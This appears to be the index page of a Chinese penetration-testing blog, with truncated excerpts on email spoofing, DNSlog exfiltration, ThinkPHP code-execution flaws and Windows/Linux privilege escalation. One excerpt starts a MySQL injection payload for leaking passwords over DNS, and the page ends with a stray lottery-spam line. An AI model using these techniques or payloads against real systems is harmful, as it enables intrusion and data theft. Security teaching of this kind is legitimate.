近期更新關于電子郵件詐騙的一些分析

mOon    滲透測試     38次查看    搶沙發    2019年06月29日

導語:一般來說,我們收到一封郵件之后,都會首先看發件人,如果是比較重要的郵件,我們可能會去看發件人地址,但是,如果發件人是偽造的,你還能知道是誰在給你發郵件么? 0x00 這是個啥? 一般來說,我們收到一封電子郵件后,都會首先看發件人,如果是比較重要的郵件,我們可能會去看一下發件人地址。但是,如果這個郵件的發件人是偽造的,你還能知道到底是誰在給你發郵件么...

如何低成本搭建dnslog服務器

mOon    滲透測試     1035次查看    搶沙發    2019年05月18日

DNSLog,簡單來說,就是通過記錄對于域名的DNS請求,通過dns請求這個相對“隱蔽”的渠道,來委婉地獲取到想要獲得的信息。 例如,在一個針對mysql數據庫的注入中,如果沒有回顯,可能很多時候就要歇菜。 但如果對方的數據庫服務器連接公網并且是Windows機器的話,就可以用這種姿勢來獲取信息: SELECT LOAD_FILE(CONCAT('\\\\',(SELECT pas...

Thinkphp5.1 ~ 5.2代碼執行漏洞

mOon    漏洞收集     1026次查看    搶沙發    2019年05月17日

Thinkphp5.1 ~ 5.2 代碼執行漏洞 需要在library/think/Error.php中設置: error_reporting(0); 據作者博客中說的: 本身項目發布就需要屏蔽異常和錯誤所以這個配置是一個正常的配置 http://proxy.boomeye.com:19300/wordpress/index.php/2019/01/15/th...

域滲透(提權篇)

mOon    滲透測試     1157次查看    搶沙發    2019年05月11日

域滲透(提權篇) 常見信息收集 dir /a-r-d /s /b                        ...

JSONP與CORS漏洞挖掘

mOon    滲透測試     690次查看    搶沙發    2019年05月10日

前言 本文從筆者自己對同源策略的理解來談談與之相關的JSONP劫持和CORS錯誤配置這兩類安全問題。   同源策略(SOP) 同源策略限制從一個源加載的文檔或腳本與來自另一個源的資源進行交互,這是一個用于隔離潛在惡意文件的關鍵的安全機制.簡單說就是瀏覽器的一種安全策略。 “同源”包括三個條件: ...

Linux提權之SUID

mOon    滲透測試     643次查看    搶沙發    2019年05月10日

Linux提權之SUID 介紹 PATH是Linux和類Unix操作系統中的環境變量,它指定存儲可執行程序的所有bin和sbin目錄。當用戶在終端上運行任何命令時,它會通過PATH變量來響應用戶執行的命令,向shell發送請求以搜索可執行文件。超級用戶通常還具有/ sbin和/ usr / sbin條目以便于執行系統管理命令。 SUID屬性一般用在可執行文件上,當用戶執...

Metasploit框架中的Windows內核漏洞利用提權教程

mOon    滲透測試     626次查看    搶沙發    2019年05月09日

Metasploit框架中的Windows內核漏洞利用提權教程 Windows-Exploit-suggester Metasploit內置模塊提供了各種可用于提權的local exploits,并會基于架構,平臺(即運行的操作系統),會話類型和所需默認選項提供建議。這極大的節省了我們的時間,省去了我們手動搜索local exploits的麻煩。雖說如此...

四個linux提權腳本

mOon    神器下載     594次查看    搶沙發    2019年05月09日

簡介 當你攻擊一臺計算機時可能會遇到一些拒絕執行操作的限制,就算你有一個shell也可能會遇到此問題。為了獲得目標主機的完全控制權限,你需要在未被用戶授權的地方繞過權限控制。你可以使用這些權限刪除文件,瀏覽保密信息,或者安裝病毒等用戶討厭的軟件。 Metasploit中擁有各種奇淫巧計,讓你能遠程系統下嘗試獲取受害者電腦的系統級權限。除此之外,當你在目標機器上嘗試提升...

【轉載】Thinkphp5.1 ~ 5.2 全版本代碼執行

mOon    代碼審計     4410次查看    搶沙發    2019年01月16日

序言 最近爆出了Thinkphp5.0.*全版本代碼執行,其中5.1與5.2全版本在生產環境下下同樣也存在代碼執行 漏洞分析: 文件位置:\thinkphp\library\think\Request.php /** * 當前的請求類型 * @access public * @param bool $ori...

【轉載】ThinkPHP 5.0 * 遠程代碼執行漏洞分析

mOon    代碼審計     2921次查看    搶沙發    2019年01月12日

ThinkPHP 5.0 * 遠程代碼執行漏洞分析 本文主要以官網下載的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)為例分析。 Thinkphp處理請求的關鍵類為Request(thinkphp/library/think/Request.php) 該類可以實現對HTTP請求的一些設置。 其中成員函數metho...

?
?
河北11选5开奖